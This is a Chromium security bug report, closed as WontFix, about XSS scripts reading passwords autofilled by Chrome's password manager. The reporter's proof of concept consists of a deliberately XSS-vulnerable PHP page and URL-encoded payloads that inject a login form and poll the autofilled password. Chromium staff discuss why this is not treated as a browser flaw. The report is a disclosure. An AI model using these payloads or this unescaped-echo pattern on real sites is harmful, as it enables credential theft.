New issue
Advanced search Search tips

Issue 681791 link

Starred by 3 users
Status: WontFix
Owner: ----
Closed: Jan 2017
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: User Password Leakage from Password Manager by XSS without User Interation

Reported by har...@gmail.com, Jan 17 2017 
VULNERABILITY DETAILS
It seems Chrome prohibit to get user's password from password manager by XSS. When a malicious script try to read password field, it will returns blank value even if it looks filled password by password manager. After user operation, such as key press or click any html elements, script can get password which is filled by password manager. 
However, when user moved to the XSSed page by using JavaScript, for example by using location.href, a malicious script can get password without any user operation.
It seems that security restriction of password manager is bypassed.
And I think this should be fixed because it is similar to below:
https://finnwea.com/blog/stealing-passwords-from-mcdonalds-users

VERSION
Chrome Version: 55.0.2883.87 m
Operating System: Windows7 SP1 and OS X 10.11.6

REPRODUCTION CASE
I put demonstration on my server: http://133.242.134.241/exploit/chrome_password_manager.php

Source of this php is below:
<body>
<?php
if(!isset($_GET{"xss"}) && !isset($_POST{"pass"})) {
?>
Please submit id/pass to use password manager.
<form action="?" method="post">
<input name="id"><br>
<input type="password" name="pass">(use dummy password)<br>
<input type="submit">
</form>
<?php
}else{
?>
Please click below to fire XSS.<br>
<a href="?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27">a tag (does not work without user operation)</a><br>
<a href="#" onclick="location.href='?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27'">location.href (works without user operation)</a>
<script>
  var a='<?php echo $_GET{"xss"} ?>';
</script>
<?php
}
?>
</body>


Best regards,
Haru

Comment 1 by elawrence@chromium.org, Jan 17 2017

Components: UI>Browser>Passwords
>It seems Chrome prohibit to get user's password from password manager by XSS.

I'm not aware of any attempt to prevent reading of an autofilled password field from JavaScript, but even if there were such a feature, it couldn't be effective. An attacker could easily use script to modify the form target and submit it, leaking the credentials.

This is similar to  Issue 659953 ; XSS attacks are inherently powerful, and theft of credentials is but one consequence of that.

Comment 2 by lgar...@chromium.org, Jan 17 2017

Status: WontFix (was: Unconfirmed)

Comment 3 by har...@gmail.com, Jan 18 2017 

Thank you for your confirmation. I understand this is by design.
I think that chrome users who use password manager must know this risk. Could you please change permission of this ticket from Restrict to Public?

Comment 4 by elawrence@chromium.org, Jan 18 2017

Labels: -Restrict-View-SecurityTeam allpublic

Comment 5 by elawrence@chromium.org, Jan 19 2017 

> I'm not aware of any attempt to prevent reading of an autofilled 
> password field from JavaScript

I was mistaken. This does exist, but it's trivially circumvented. The class in question is PasswordValueGatekeeper, found in password_autofill_agent.h

The remainder of the remark is correct, however (this isn't intended or effective as a mitigation against XSS).

Comment 6 by elawrence@chromium.org, May 25 2017 

 Issue 726309  has been merged into this issue.

Sign in to add a comment